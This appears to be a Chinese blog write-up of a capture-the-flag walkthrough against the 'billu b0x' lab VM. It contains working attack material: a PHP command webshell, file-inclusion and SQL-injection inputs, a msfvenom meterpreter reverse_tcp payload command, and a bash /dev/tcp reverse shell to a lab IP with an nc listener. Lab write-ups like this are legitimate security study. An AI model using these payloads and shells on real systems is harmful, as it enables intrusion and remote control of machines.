• billu b0x


    信息收集

    使用fping扫描存活主机,发现192.168.0.128

    有80的乌班图搭建的服务、22的ssh端口

    然后访问页面80

    image-20210818204607435

    提示sql注入

    找sql注入name的字典,注入,发现失败,可能过滤的跟正常的不一样

    image-20210818184928283

    后来尝试sqlmap

    也扫描失败

    emm换条路

    dirb使用大字典扫描,发现

    2021-08-18 20-43-45 的屏幕截图

    尝试过后发现

    /add
    /test
    c
    /images/
    /phpmy/    phpmyadmin的登录界面
    phpmy/子目录
    show
    /in
    /uploaded_images/
    还有80的/index.php
    

    尝试了/add

    发现是一个静态网页,只是判断是否为文件,然后302跳转到还是/add

    并且尝试上传jpg文件,发现在/images/或者/uploaded_images/都没有变化,更加验证网页的不行

    换一个网页

    发现/in的php版本的网站搭建的信息

    之前访问c、show发现无法打开,空白,可能是没有权限

    在 est访问网页,发现有file参数

    尝试hackerbar的post传参

    下载c、show的文件

    下载c传参,自己下载panel.php,show也一样

    image-20210818210435457

    打开发现文件引用的c.php,head2.php,并且发现了文件上传点,同时是白名单的上传,wap没有说是IIS多少,可能尝试配合解析漏洞

    image-20210818210717734

    并且出现文件include文件包含,文件名为load

    image-20210818222144758

    出现一个问题,无论下载c.php还是show的都是下载panel的,尝试换一个hackbar从而下载

    image-20210818211416292

    AAA

    在c.php发现数据库密码

    image-20210818211503802

    发现账户密码

    image-20210818211617781

    进行登录

    在显示用户那,每一个上传的图片都会在这里显示

    image-20210818211810220

    然后上传文件并用c32包含一句话

    image-20210818212514577

    连不上

    参考文章后

    发现无法访问使用菜刀,因为是post请求,并且只能包含使用

    上传cmd一句话

    <?php system($_GET['cmd']); ?>
    

    利用hackerbar请求

    post

    load=/uploaded_images/aa.jpg&continue=continue

    image-20210819082943620

    可能字符有限,当前页面显示不出来,就用源代码查看

    image-20210819083024047

    发现了好多php文件,可以一会再看

    然后上传一句话到php文件

    还有要注意编码在=后面的指令

    从而来连接菜刀

    BBB

    通过目录扫描、phpinfo的路径信息猜到phpmy是主目录,然后猜测到/var/www/phpmy/里的配置文件config.inc.php

    查看用户配置,从而直接远程连接ssh

    2021-08-19 08-52-00 的屏幕截图

    CCC

    msf监听

    利用php文件进行

    菜刀上传

    msfvenom  -p  php/meterpreter/reverse_tcp LHOST=   -f raw >a  .php
    

    DDD

    nc反弹获取shell

    和上次的靶机差不多

    echo ’bash -i >& /dev/tcp/192.168.0.104/6666 0>&1‘ | bash
    bash -i : bash是Linux下一个常见的shell,-i参数表示产生一个交互式的shell
    /dev/tcp|udp/ip/port是一个Linux中比较特殊的一个文件,如果在Linux上访问就会发现这个文件并不存在,其含义是让主机与目标主机ip在端口port建立一个tcp或udp连接
    记住就行
    

    然后kali

    nc -lvp 6666
    

    su切换用户

    不成功就用本地的su

    python -c ‘import pty;pty.spawn(“/bin/bash”)’
    

    EEE

    下载开始的sql的index.php

    然后根据对和‘替换成空然后返回到变量
    并且是指定文件的php进行数据交互,明细存在很严重的sql注入
    image-20210819142110818

    image-20210819100618101

    使用万能语句添加末尾并进行逃逸

    or 1=1 -- 
    'or 1=1 -- 
    等等
    

    FFF

    本想通过菜刀上传cs的文件

    发现cs没有php监听的文件

    就放弃了

    其实想在不是用菜刀的情况下直接echo 追加覆盖,但url有限制对长度,所以失败,只能用菜刀进行文件上传

    总结

    看了大佬的文章,想对linux进行提权,但自己对此还不熟悉,今天下午再熟悉学习一下

    参考链接:

    https://www.jianshu.com/p/2a7f61bbd862?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

    别人都在不停的努力,自己又怎么会停
  • 相关阅读:
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单:复选框(Checkbox)和单选框(Radio)
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单:文本框(Textarea)
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单:输入框(Input)
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单:水平表单
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单:内联表单
    吴裕雄 Bootstrap 前端框架开发——Bootstrap 表单
    【codeforces 707E】Garlands
    【codeforces 766E】Mahmoud and a xor trip
    【hiho一下 第144周】机会渺茫
    【codeforces 792C】Divide by Three
  • 原文地址:https://www.cnblogs.com/chenyouxiu/p/15160488.html
Copyright © 2020-2023  润新知